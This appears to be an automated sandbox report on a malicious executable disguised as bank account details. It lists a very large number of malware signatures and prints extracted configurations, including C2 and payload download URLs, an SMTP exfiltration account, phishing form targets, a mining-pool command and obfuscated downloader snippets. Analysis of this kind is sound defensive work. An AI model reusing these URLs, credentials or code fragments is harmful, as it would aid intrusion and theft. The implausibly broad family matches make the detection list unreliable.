Play interactive tour
Edit tourWindows Analysis Report Foreign_Bank Account Details.exe
Overview
General Information
| Sample Name: | Foreign_Bank Account Details.exe |
| Analysis ID: | 1613 |
| MD5: | 8906fa5fed7b1d3d2e5579d97419c076 |
| SHA1: | f4488a79fcb657eb1f3f23c6ce181ae7176fb11c |
| SHA256: | d1a3f5513cfaf506e96e6304d259fb03f5dc23542301fc9c7335a6e921ad65f9 |
| Infos: | |
Most interesting Screenshot:  | |
Detection
RemCom RemoteAdmin Mimikatz HawkEye Imminent Nanocore Remcos GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Yara detected PasteDownloader
Detected Hacktool Mimikatz
Yara detected BlackMoon Ransomware
Yara detected Snake Keylogger
Yara detected Ragnarok ransomware
Yara detected Globeimposter Ransomware
Yara detected Evrial Stealer
Yara detected Avaddon Ransomware
Yara detected GhostRat
Yara detected Mini RAT
Yara detected BLACKMatter Ransomware
Yara detected Koadic
Yara detected Jigsaw
Antivirus detection for URL or domain
Yara detected AESCRYPT Ransomware
Yara detected Rapid ransomware
Yara detected RansomwareGeneric
Yara detected Ouroboros ransomware
Yara detected Fiesta Ransomware
Yara detected Lolkek Ransomware
Yara detected LimeRAT
Yara detected GuLoader
Yara detected Chaos Ransomware
Yara detected Hancitor
Yara detected TeslaCrypt Ransomware
Found malware configuration
Yara detected Mock Ransomware
Yara detected Conti ransomware
Yara detected Generic Dropper
Yara detected NoCry Ransomware
Yara detected ByteLocker Ransomware
Yara detected RegretLocker Ransomware
Yara detected Crypt ransomware
Yara detected Meterpreter
Yara detected Clop Ransomware
Yara detected Xmrig cryptocurrency miner
Yara detected ISRStealer
Yara detected LockBit ransomware
Yara detected LOCKFILE ransomware
Yara detected Cerber ransomware
Yara detected Rhino ransomware
Yara detected Niros Ransomware
Yara detected Buran Ransomware
Yara detected VHD ransomware
Yara detected generic Shellcode Injector
Yara detected Netwalker ransomware
Yara detected Vidar stealer
Yara detected Jcrypt Ransomware
Yara detected Delta Ransomware
Yara detected Predator
Yara detected Mimikatz
Detected HawkEye Rat
Detected Remcos RAT
Sigma detected: RegAsm connects to smtp port
Yara detected RevengeRAT
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Yara detected LaZagne password dumper
Yara detected Metasploit Payload
Yara detected LazParking Ransomware
Yara detected Discord Token Stealer
Yara detected MailPassView
Yara detected Parallax RAT
Yara detected GlobeLocker Ransomware
Yara detected Zeppelin Ransomware
Yara detected Apis Ransomware
Yara detected Wannacry ransomware
Yara detected AgentTesla
Yara detected MegaCortex Ransomware
Yara detected Valak
Yara detected AntiVM3
Yara detected Cobra Locker ransomware
Yara detected RekenSom ransomware
Detected Nanocore Rat
Yara detected Babuk Ransomware
Yara detected Nemty Ransomware
Yara detected NetWire RAT
Yara detected Linux EvilGnome RC5 key
Yara detected Clay Ransomware
Yara detected Thanos ransomware
Yara detected CryLock ransomware
Yara detected Pony
Yara detected OCT Ransomware
Yara detected Snatch Ransomware
Yara detected VBKeyloggerGeneric
Yara detected Silvertor Ransomware
Yara detected Coinhive miner
GuLoader behavior detected
Yara detected Annabelle Ransomware
Yara detected Gocoder ransomware
Detected Imminent RAT
Yara detected BitCoin Miner
Yara detected WannaRen ransomware
Multi AV Scanner detection for submitted file
Yara detected Ryuk ransomware
Yara detected Zeoticus ransomware
Yara detected Porn Ransomware
Yara detected DarkSide Ransomware
Malicious sample detected (through community Yara rule)
Yara detected HiddenTear ransomware
Yara detected Telegram RAT
Yara detected WormLocker Ransomware
Yara detected Mailto ransomware
Yara detected Voidcrypt Ransomware
Yara detected Njrat
Yara detected GoGoogle ransomware
Yara detected Axiom Ransomware
Yara detected Artemon Ransomware
Yara detected Betabot
Yara detected Covid19 Ransomware
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Yara detected Nukesped
Yara detected LokiLocker Ransomware
Yara detected Cryptolocker ransomware
Yara detected Marvel Ransomware
Multi AV Scanner detection for domain / URL
Yara detected Codoso Ghost
Yara detected Cute Ransomware
Yara detected 0x0M4R Ransomware
Yara detected Growtopia
Yara detected Windows Security Disabler
Yara detected Amnesia ransomware
Yara detected Dorkbot
Contains VNC / remote desktop functionality (version string found)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
May modify the system service descriptor table (often done to hook functions)
Yara detected AllatoriJARObfuscator
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Found potential ransomware demand text
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Hides threads from debuggers
Writes to foreign memory regions
Yara detected MSILLoadEncryptedAssembly
Binary or sample is protected by dotNetProtector
C2 URLs / IPs found in malware configuration
May enable test signing (to load unsigned drivers)
Deletes shadow drive data (may be related to ransomware)
Found strings related to Crypto-Mining
Tries to detect Any.run
Found Tor onion address
Sample is not signed and drops a device driver
Tries to harvest and steal browser information (history, passwords, etc)
Found string related to ransomware
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Yara detected VB6 Downloader Generic
Contains functionality to hide user accounts
Modifies the hosts file
May drop file containing decryption instructions (likely related to ransomware)
Yara detected Autohotkey Downloader Generic
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Creates driver files
Checks if the current process is being debugged
May initialize a security null descriptor
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
Contains functionality to query the security center for anti-virus and firewall products
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Yara detected RemCom RemoteAdmin tool
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Contains strings related to BOT control commands
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Winexe tool
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Yara detected Keylogger Generic
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
May infect USB drives
PE file contains sections with non-standard names
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Yara detected Credential Stealer
PE file contains executable resources (Code or Archives)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Uses SMTP (mail sending)
Enables security privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
Process Tree |
|---|
|
Malware Configuration |
|---|
Threatname: Agenttesla |
|---|
{"Exfil Mode": "SMTP", "SMTP Info": "purchasing@cselegance.comCSE.868mail.cselegance.com"}Threatname: Pony |
|---|
{"C2 list": ["http://www.trotux.com/?z=", "http://www.zhongsou.com/kefu/zskf.htm", "http://www.w3.org/1999/xsl/transform", "http://evanstechnology.com", "http://41.59.0.100/intranet", "http://www.microsoft.com", "http://www.direct-ip.com/", "http://downloadfilesldr.com/index5.php?adv=141", "http://spywaresoftstop.com/download/141/setup.exe", "http://service.srvmd6.com/Mac/getInstallerSettings/?version=", "http://gveejlsffxmfjlswjmfm.com/files/", "http://so1.5k5.net/interface?action=install&p=", "http://thespecsupportservice.com/uno.dat", "http://110.42.4.180:", "http://pznjaslo.pl/wp-content/outstanding-invoices/", "http://aindonashi.blogspot.com/", "http://www.alibaba.com", "http://(www|corail)\\\\.sudoc", "http://downloadfilesldr.com/index2.php?adv=141", "http://santasalete.sp.gov.br/jss/", "http://acayipbiri.blogspot.com/", "http://bardubar.com/mMS83JIdhq/ieygBSH38hsJa/", "http://xn--", "http://a.pomf.cat/", "http://cicahroti.blogspot.com/ ", "http://22y456.com/", "http://my-speak.eu/csioj.exe", "http://babukq4e2p4wu4iq.onion", "http://62.210.214.", "http://articlunik.blogspot.com/", "http://spotdewasa.blogspot.com/", "http://basti.ciseducation.org/website/images/prettyphoto/dark_square/.x1-unix/", "http://www.nytimes.com", "http://contentedmerc.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=", "http://d1.downxia.net/products/", "http://www.gamedanji.cn/ExeIni", "http://aitimatafb.blogspot.com/", "http://berkah2013.blogspot.com/", "http://bigboobsp.blogspot.com/ ", "http://aspeja.org/question/", "http://www.apple.com", "http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/", "http://microhelptech.com/gotoassist/", "http://pastebin.com/", "http://www.fastclick.com", "http://errors.statsmyapp.com", "http://gicia.info/cd/cd.php?id=%s&ver=g", "http://musah.info/", "http://%s/buy_online.php", "http://apee296.co.ke/tatiyv6824540/gescanntes-dokument/zahlungserinnerung", "http://www.tripod.com", "http://batrasiaku.blogspot.com/", "http://gaigoixxx.blogspot.com/ ", "http://www.sqwire.com", "http://arthisoft.blogspot.com/ ", "http://www.steelbendersrfq.cf/", "http://gg", "http://www.", "http://yamaofficial.com/rxuczm/3415201.png", "http://www.xanga.com", "http://www.cnn.com", "http://xn---82-qdd0akcfirgv4j.xn--p1ai/ups-ship-notification/mar-13-18-07-06-38/", "http://wmwifbajxxbcxmucxmlc.com/files/", "http://81.177.26.20/ayayay", "http://i.compucrush.com/i.php", "http://jugnitv.com/final.jpg", "http://www.consumerinput.com/", "http://104.236.94.", "http://cl.1ck.me/", "http://seuufhehfueughek.ws/", "http://bonkersmen.blogspot.com/", "http://www.j.mp/", "http://lialer.com/wFBIQQUccZOdYQKJvhxm/ejrwqokckt.exe", "http://www.mlb.com", "http://www.friskypotato.com/", "http://tumicy.com/plqijcndwoisdhsaow/", "http://pages", "http://www.yahoo.com", "http://whatami.us.to/tc", "http://darkside", "http://www.monster.com", "http://www.netscape.com", "http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php", "http://200.74.240.151/saturno/w8.txt", "http://downloadfilesldr.com/index4.php?adv=141", "http://download.zhongsou.com/cdsearch/", "http://spywaresoftstop.com/wfdfdghfdghj.htm", "http://brembotembo.com/doc.xls", "http://cts.hotbar.com/trackedevent.aspx", "http://%s/sync.php", "http://31.192.210.", "http://chemgioaz.blogspot.com/ ", "http://likesomessfortelr.eu/mSsNX3JDSJD/inNSj398LSj/", "http://203.199.200.61", "http://www.alexa.com", "http://www.microsoft.com0", "http://8nasrcity.blogspot.com/ ", "http://www.bookiq.bsnl.co.in/data_entry/circulars/m", "http://mydirecttube.com/", "http://ajeyftrjqeashgda.mobi/mSsQDIMIQ/inIDw/", "http://aolopdephn.blogspot.com/", "http://faithhotelghana.com", "http://94.102.14.", "http://www.diannaowang.com:8080", "http://200.74.240.151/saturno/w7.txt", "http://www.searchmaid.com/", "http://www.moliv.com.br/stat/email0702/", "http://%s%simg.jpg", "http://gosgd.com", "http://owwwc.com/mm/", "http://pig.zhongsou.com/helpsimple/help.htm", "http://avnisevinc.blogspot.com/", "http://hostthenpost.org/uploads/", "http://pssquared.com/invoice-status/tracking-number-and-invoice-of-your-order/", "http://www.lycos.com", "http://192.189.25.17/cgbin/ukbros", "http://208.95.104.", "http://tempuri.org/", "http://afkar.today/test_coming.training/w_f/", "http://tsrv4.ws/", "http://%domain%/config.php", "http://dl.dropbox.com/u/", "http://www.klikspaandelft.nl/", "http://cs.zhongsou.com/", "http://mitotl.com.mx/ups.com/", "http://%s", "http://autothich.blogspot.com/ ", "http://march262020.com/files/", "http://www.pornpassmanager.com/d", "http://www.icq.com", "http://%domain%/update.php", "http://%s:%i%s", "http://www.88vcd.com/htm/china/myb/send.asp?daqu=%s&xiaoqu=%s&user=%s&pass=%s&ckpass=%s&renwu=%s&level=%d&gold=%d&stone=%d&cpname", "http://tool.world2.cn/toolbar/", "http://coltaddict.blogspot.com/", "http://alindaenua.blogspot.com/", "http://tinyurl.com/", "http://www.virtrigger.com", "http://qwuyegasd3edarq6yu.org/mSsQDIMIQ/ind7694GDs/", "http://www.niudoudou.com/web/download/", "http://millennium-traders.info", "http://www.youndoo.com/?z=", "http://devee.emlnk.com/lt.php?s=b7abe8a8120881cc5c9dab6eac28ddbe&i=1a3a1a", "http://200.159.128.", "http://1bestgate.blogspot.com/ ", "http://www.preyer.it/ups.com/", "http://www.adserver.com", "http://5starvideos.com/main/", "http://march262020.club/files/", "http://session-dyfm.clientmsg13.review/8446c35a41f9e820533b6cd008b40749?fpcum=&dyfm=ywx2yxjvx3zlbgfzy29adndylmnvbq==&dyfm=cpjyicit", "http://www.surprisingdd.top", "http://www.facebook.com/", "http://agressor58.blogspot.com/", "http://arifkacip.blogspot.com/ ", "http://95.173.183.", "http://bittupadam.blogspot.com/", "http://94.103.85.236/ds/11.gif", "http://www.%domain%/updates/check.html", "http://srmvx.com.br/uploads/", "http://webpatch.ragnarok.co.kr/", "http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/", "http://alhalm-now.blogspot.com/", "http://fateh.aba.ae/abc.zip", "http://abeidaman.blogspot.com/ ", "http://131.153.38.125/", "http://www.amazon.com", "http://%s/support.php", "http://50.63.128.", "http://animefrase.blogspot.com/", "http://booknology.com/", "http://www.lumina.it/wp-content/plugins/all-in-one-wp-migration/storage/client/invoice-978561/", "http://bgtc.pctonics.com", "http://rentalhabneew.com/", "http://maldonaaloverainc.com/", "http://216.172.172.40/~agora546/cardoso/dilma.zip", "http://beautifulmaori.co.nz/wp-content/plugins/wp-xmll_2/gorfy2pq/1ny0mnkih27id8m.ktk", "http://batysnewskz.kz/ups.com", "http://61.19.253.", "http://downloadfilesldr.com/index3.php?adv=141", "http://%s:%d/%d%s", "http://179.43.158.187/PhtJFr0fvBk2.php", "http://spywaresoftstop.com/load.php?adv=141", "http://wevx.xyz/post.php?uid=", "http://dontkillme/", "http://activecodec.0fees.net/codec/mp3/codec_download.htm", "http://zilmaraalencar.com.br/layouts/plugins/editors/tinymce/field/zzurphy.php", "http://highpay.website/css/windows.jar", "http://update.7h4uk.com:443/antivirus.php", "http://update.xiaoshoupeixun.com/tsbho.ini", "http://hotedeals.co.uk/ekck095032/", "http://gosgd2.com", "http://3s249.s249327.96.lt/mss2ro37qtl3cbw9vo0lk2bx8vv7jmx2mlesim9ddw11fem3sjp3ijuoufk/mss.php", "http://sameshitasiteverwas.com/traf/tds/in.cgi", "http://ahmad-roni.blogspot.com/", "http://citw-vol2.blogspot.com/ ", "http://%s:%d/%s%d%08d", "http://kolyherqylwa9ru.top/log.php?f=400\",zigmep0());ixunlaw4=samagsi0[awolgify4()]();ypjatlaci6[ygulsivko6()]=krubyfacifv2();erqylwa9=samagsi0[hojmed4()];geqilra0=wmetoqe0[betyquzt6()];}ixunlaw4=ypjatlaci6[azgorpydbibd4()]();ixunlaw4=ypjatlaci6[ildig0()](erqylwa9);ixunlaw4=ypjatlaci6[onesothaz0()](kqoctim8+lcacsovy5);ixunlaw4=ypjatlaci6[oxkucfur4()]();ixunlaw4=iliqof8[agajdojj9()](rpolje4()+kqoctim8+lcacsovy5,zigmep0());}catch(e){}", "http://f1visa.info/cd/cd.php?id=%s&ver=g", "http://13.233.183.227/de/lngukm2012920/bestellungen/zahlung", "http://cvfanatic.blogspot.com/ ", "http://www.qq994455.com/", "http://20vp.cn/moyu/", "http://www.ebay.com", "http://fateh.aba.ae/xyzx.zip", "http://3dplayful.blogspot.com/ ", "http://vequiato.sites.uol.com.br/", "http://malikberry.com/files101/htamandela.hta", "http://bbc.lumpens.org/", "http://verticalagriculture.net/files/csrss.jar", "http://31.192.209.", "http://31.192.211.", "http://lo0oading.blogspot.com/ ", "http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=", "http://best4hack.blogspot.com/ ", "http://www.mapquest.com", "http://ip-api.com/json/", "http://888888.2288.org/Monitor_INI", "http://te.platrium.com/pte.aspx", "http://www.phokhobazan.com/%202%200%201%208-0%207%20-%201%201%202%200%200%207:%202%206:%2099%20819.php/?email=kevind@hollywoodwoodwork.com\"target=\"_blank", "http://config.juezhao123.com/c.ashx?ver=&c=", "http://brembotembo.com/2.dat", "http://%s:%i%s?mod=cmd", "http://detayworx.com/_vsnpNgyXp84Os8Xh.php", "http://checkip.dyndns.org/", "http://whenyouplaygood.com/s/gate.php?a\");f[\"\\x73\\x65\\x6e\\x64\"]();eval(f[\"responsetext\"", "http://www.nba.com", "http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/", "http://www.agendagyn.com/media/fotos/2010/", "http://www.thon-samson.be/js/_notes/", "http://anomaniez.blogspot.com/ ", "http://masgiO.info/cd/cd.php?id=%s&ver=g", "http://binyousafindustries.com/fonts/jo/mops.exe", "http://%s/features.php", "http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56", "http://iranvision1404.com/ss/info/redebit_transactions/terms/kohc-xuxo_lcxty-av6e", "http://92.222.7.", "http://brembotembo.com/1.dat", "http://ow.ly/QoHbJ", "http://%s/v_install?sid=16045&start=1&guid=$__GUID&sig=$__SIG&ovr=$__OVR&browser=$__BROWSER&label=%s&aux=%d", "http://aancyber77.blogspot.com/", "http://2010-kpss.blogspot.com/ ", "http://www.sacbarao.kinghost.net/", "http://downloadfilesldr.com/allfile.jpg", "http://5starvideos.com/main/K", "http://sf3q2wrq34.ddns.net", "http://www.ip2location.com/", "http://88888888.7766.org/ExeIni", "http://worm.ws/", "http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn", "http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiyw", "http://dudethisishowwedoitallnightlong.2myip.net", "http://dmww.dmcast.com/script/update.asp?version=%s", "http://docs.herobo.com", "http://directplugin.com/dialers/", "http://www.xpassgenerator.com/software/d"]}Threatname: Metasploit |
|---|
{"Type": "Execute Command", "Command": "\u0001"}Threatname: CryLock |
|---|
{"Extensions": "dpost cal ed, module handle c:\\temp\\co kies.log WantRele !Trickbot.AAA!sms !Trickbotpw.A!mod Grab_Passwords_Chrome(0) Grab_Passwords_Chrome() success Grab_Passwords_Chrome(): Can't open database \\Google\\Chrome\\User Data\\Default\\Login Data.bak [Reflection.Assembly]::LoadFile(\"$binpath\\KeePass.exe\") Write-warning \"Unable Load KeePass Binarys\" Internet Explorer Internet Explorer] !Trickbotem.A!mod Grabbed %s from Inbox Grabbed %s from Contacts Error hiding Outlook from the taskbar Hide Outlook from system tray StartOutlook(): before hide c:\\temp\\mail.log StartOutlook(): ShellExecuteW() %S %S StartOutlook(): ShellExecuteW() %S %S] !TrickBot.I!MTB !TrickBot.J!MTB XYXEQX8dMYWKgX8KMNQpqCL \tgMofH.dll !Control !ControlFreeBufferReleaseStart !TrickBot.K!MTB Xvaultcli.dll SysListView32 atl.dll SRVDATA.dll NetServerStart NetServerStop JSRVDATA.dllControlFreeBufferNetServerStartNetServerStopReleaseStart !Trickbot.V!ibt +VC20XC00U Trojan:Win64/TrickInj.A!MTB inj_64.dll [INIT] Inj = %u [INIT] BC = %u [INIT] Proxy = %u #pgid# #pgid#] !TrickBot.A!ibt \\rdpscan.pdb Control ControlFreeBufferReleaseStart] TrojanDownloader:O97M/Emotet.QAZ!MTB $TrojanDownloader:O97M/Emotet.QAZ!MTB TrojanDownloader:O97M/Emotet.RAA!MTB $TrojanDownloader:O97M/Emotet.RAA!MTB TrojanDownloader:O97M/Emotet.RAB!MTB $TrojanDownloader:O97M/Emotet.RAB!MTB !Trickbotspr.A!mod CmainSpreader::init() CreateThread, error code %i CmainSpreader::init() CreateEvent, error code %i WormShare lsass.exe End of Romance spreader with module handle 0x%08X is started spreader with module handle 0x%08X is started] !TrickInj.B!MTB inj_32.dll #gid# /QConnection !EmotetCrypt.MR!MTB Trojan:Win64/Trickbot.SS!MTB dllor.dll bEjvvgF7zLSVe7I SKe1E7e1BJnWQG 0qjqOSdonoe2dLUW !ControlFreeBufferReleaseStart] TrojanDownloader:O97M/IcedID.YJ!MTB #TrojanDownloader:O97M/IcedID.YJ!MTB !Trickbot.PN!MSR rdpscan.dll rdpscan.pdb rdpscan.pdb] Behavior:Win32/Trickbot.A!sms !Trickbot.A!sms !Trickbot.B!ibt \\webinject32.pdb \\webinject62.pdb ControlFreeBufferReleaseStart WebInject build %s %s (%s) starting STATIC FAKE rebuild= Injection failure process pid = CheckAndInjectExplorer(): CreateToolhelp32Snapshot(): Chrome is zombie Starting and injecting chrome [INJECT] inject_via_remotethread_wow64 [INJECT] inject_via_remotethread_wow64] !Trickbot.N grab_passwords_chrome() )from logins where blacklisted_by_user = 0 \\default\\login data.bak mimikatz] !Trickbot.O [reflection.assembly]::loadfile(\" \\keepass.exe\") MTIzNA==; cXdlcg==; MTIzNA==; cXdlcg==;] !TrickbotVP.A!MTB vpnDll build %s %s started VPN bridge failure 11:43 vpnDll.dll WantRelease RasGetConnectStatusA] !Azurlt!MTB U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs SetEnvironmentVariableW CreateProcessAsUserW GlobalMemoryStatus SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA== GDIScreenShot CryptReleaseContext CryptUnprotectData PVAULT_CRED8 Process32NextW uFileFinderU uIE7_decodeU ShellExecuteExW GetLogicalDriveStringsA InternetCrackUrlA HttpAddRequestHeadersA Browsers\\Cookies Browsers\\Cookies] Trojan:Win64/Trickrdp.A!MTB BotID trybrute rdp/names rdp/dict rdp/over rdp/freq rdp/domains rdp/domains] Trojan:Win64/Trickrdp.B!MTB F:\\rdpscan\\Bin\\Release_logged\\x64\\rdpscan.pdb !OceanLotus.AC!MTB 977Lp Trojan:HTML/Phish.JAD!MTB <formaction=http://tenillar.com/ko/pos.phpmethod=post> 8<formaction=http://tenillar.com/ko/pos.phpmethod=post> <formaction=http://185.236.231.209/xcel/copy/xel.phpmethod=post> B<formaction=http://185.236.231.209/xcel/copy/xel.phpmethod=post> <formclass=\"modal-contentanimate\"method=\"post\"action=\"http://185.236.231.210/test/en/dsf.php\"> `<formclass=\"modal-contentanimate\"method=\"post\"action=\"http://185.236.231.210/test/en/dsf.php\"> Behavior:Win32/SvchostInject.B Behavior:Win32/WermgrInject.A .@\t Xp .@ Xp Exploit:O97M/CVE-2017-0199.YAB!MTB \"Exploit:O97M/CVE-2017-0199.YAB!MTB target=\"http://tsdyprivatecloudshareandfileprotectsyta.ydns.eu/receipt/invoice_141140.doc\"targetmode=\"external ptarget=\"http://tsdyprivatecloudshareandfileprotectsyta.ydns.eu/receipt/invoice_141140.doc\"targetmode=\"external TrojanDownloader:O97M/Emotet.RAC!MTB $TrojanDownloader:O97M/Emotet.RAC!MTB Trojan:Win64/Trickbot.A!mod rdpscan.dllControlFreeBufferReleaseStart] Trojan:Win64/TrickbotMshare.A!MTB !Trojan:Win64/TrickbotMshare.A!MTB 7c8DhxWXjErT7C/z7ce 4Pj+/D9oJP4ZJDyoG2j+/D9oJc7qG2j1JD4MuLYLIE+oVg5 PDPqIPj+/D9oJGjcIG4Lswjo IgYMmw4d/CWzmw9a IgYMmw4d/CWzmw9a] Ransom:Win32/CerberCrypt.SU!MTB Trojan:PDF/Phish.SK!MSR !Trickbot.SV!MTB MoveLeft Release] Trojan:PDF/Phish.VT!MSR Stelega.AS!MTB Behavior:Win32/Pacalau.A Behavior:Win32/Rawanpec.A @$^O3 Trojan:Win64/Trickbot.SE !Trickbot.AAB !Trickbot.AAB&@ \"X7fv dllControlFreeBuffer ReleaseStart .dllControlFr eBuffer eBufferNetServerStartNetServerStopReleaseStart Backwar .dllBackwar Forward Pause ControlForwardFreeBufferPauseReleaseReverse ControlCreateInstanceF eeBuffer eeBufferReleaseStart ?Stop@@ .dll?Stop@@ .dllControlFreeBuffer OnLoad OnUnload OnUnloadReleaseStart ?DLLControl@@@@ .dllControl?DLLControl@@@@ ?DLLFreeBuffer@@ 0?DLLFreeBuffer@@ ?DLLRelease@@ 0?DLLRelease@@ ?DLLStart@@ 0?DLLStart@@ @FreeBufferRelease ?Find@@Y ?Init@@Y ?Shutdown@@Y _Control@ .dll_Control@ _FreeBuffer@ _Release@ _Start@ ?ReleaseA@@Y .dllControlFreeBufferRelease?ReleaseA@@Y .dll?ReleaseA@@Y AboutDialogP .dllAboutDialogP ocControlDllRegisterServerDll nregisterServer JNI_OnLoad JNI_OnUnload nregisterServerFreeBufferJNI_OnLoadJNI_OnUnloadReleaseStart !Trickbot.ZC core-parser.dll BanRule ClearRules ConfigInitDpost ConfigInitDynamic ConfigInitStatic EnumDpostServer core-parser.dllBanRuleClearRulesConfigInitDpostConfigInitDynamicConfigInitStaticEnumDpostServer /rcrd/ /getq/ /snapshoot/ /rcrd//getq//snapshoot/ Behavior:Win32/TrickBot.B!nri !Invacert.A!MSR !Trickbot.ZD F:\\Projects\\WebInject\\bin\\x86\\Release_logged\\payload32.pdb Payload (build %s %s) injected D$LDS D$QY3 !Xtrat!MSR Ea.,g Behavior:Win32/BDNS.S @ %program_files% Behavior:Win32/BDNS.R Behavior:Win32/BDNS.X SuspUnixReShellCmd.O /bin/ AGamarue !Gamaure !Nivdort.DH watch_dog_name.exe /index.php?data= ADRIANCOPILULMINUNESIFLORINSALAM ADRIANCOPILULMINUNESIFLORINSALAM] !Obfuscator.TX s=\"\"dimnn=0dimnnnn=\" cs=\"\"dimnn=0dimnnnn=\" \"dountiln=len(m)n=n+1s=s&chrw(ascw(mid(m,n,1))-&h9000+len(nn))loopexecutes !Obfuscator.TY Behavior:Win32/EdgeInjectBlock.A . Behavior:Win32/EdgeInjectBlock.A Rdpbrute.A !Hagcons.A 'CcZ\tm q2m:? i?/ag^ i?3Vq i?m:? =|+5` 6jFSlL !Dinolap!rfn !Injector.BH!bit Injector.II!bit CreateDecryptorTransformFinalBlock System.Reflection.Assembly !Posokap.A!bit KAPTOXA oscan process with pid for kartoxa \\mmon.pdb !Genmaldow.A!bit C:\\Program Files\\Cmd Files\\ img.syuan.net/forum/ MyAppByMulinB ExeProcesstest server.dat !Injecter MineBicoin.Y minerd-acryptonight-ostratum+tcp://mine.moneropool.org:80-u463rxdz7msmsodw Lminerd-acryptonight-ostratum+tcp://mine.moneropool.org:80-u463rxdz7msmsodw !Banload.BGC content-na.drive.amazonaws.com/cdproxy/templink/ ://cl.ly/ WshShell.Run chr(34) & \" .exe\" & Chr(34),0 !Miniduke!rfn !Spiliwan!rfn !Cuffahlt.C hostf shdnf cachf noncf cmdrf Uflooder.A!bit UDP_Flood Start Attack Eternals UDP Flood !Twexag.B @ \":data=split(data,\"h\")(1):subsavefile(fname,str):dimtemp:setxmldoc=createobject(\"microsoft.xmldom\"):xmldoc.loadxml\"<?xmlversion=\"\"1.0\"\"?>\":setpic=xmldoc.createelement(\"pic\"):pic.datatype=\"bin.hex\":pic.nodetypedvalue=str:temp=pic.nodetypedvalue:withcreateobject(\"adodb.stream\"):.type=1:.open:.writetemp:.savetofilefname,2:.close:endwith:endsub:setws=createobject(\"wscript.shell\"):fn=ws.expandenvironmentstrings(\"%temp%\")&\"\\tmp.exe\": Ransom:Win32/Empercrypt.A schtasks.exe /delete /TN uac /F 0YOUR PERSONAL INFORMATION ARE ENCRYPTED by 7ev3n *bcdedit /set {current} recoveryenabled off dblockchain.info/api/receive?method=create&address= FILES_BACK.txt 4?SSTART=true&CRYPTED_DATA= \"fgate.php?RIGHTS= !Doedlid !Banload.BGD !Tacpud.A RWQEq Disable_All [RCon]| [New]| [Rcon]| [Done]| [Move]| [TCP]| [UDP]| [HTT]| [Wait]| Open !Nivdort.DI Trojan:Win64/MineBicoin.Y !MineBicoin.Y !Itagomoko.A !Itagomoko.A]@ |<\tts O>YmE6 |Sc0vA7 _GV!{ Backdoor:Win64/Kenoja.A AAxpergle.CH U?\"\\x 0-9a-f\":\" a-z+=( 0-9+?\" !Pizwin.A ARedirector.QA .useragent;varb3p3f=0;if(nsd5ik.indexof(\"\\u0057in\\x64ows\")==-1||(nsd5ik.indexof(\"msi\\u0045\")==-1&&nsd5ik.indexof(\"\\u0047ec\\u006bo/\")==-1&&nsd5ik.indexof(\"trid\\u0065n\\u0074\")==-1)){return0;}try{try{if(demsfw(jcvjp4p)==od4rg9){returnfalse;}}catch(rdwfb9t){};if(nsd5ik.indexof(\"ms\\x49e\")!=-1||nsd5ik.indexof(\"\\x54rid\\u0065nt\")!=-1){try{b3p3f=umm8qu();functionumm8qu !QQpass.CKH!bit qq.exe786464602A3F3F SendSMSActive Action=AddUser&Server= &User= !Expiro.EA!bit BAOAOOAAO !Fakeon.A!bit 1sass.exe New Folder.exe Hideprocess @Autor David Farji - Concepto 201 !Lidared !Banload.BGE !Injector.ID!bit !Injector.IE!bit !Delf.ZXX!bit !Itagomoko sn\t(,~3 !Wmfap!rfn 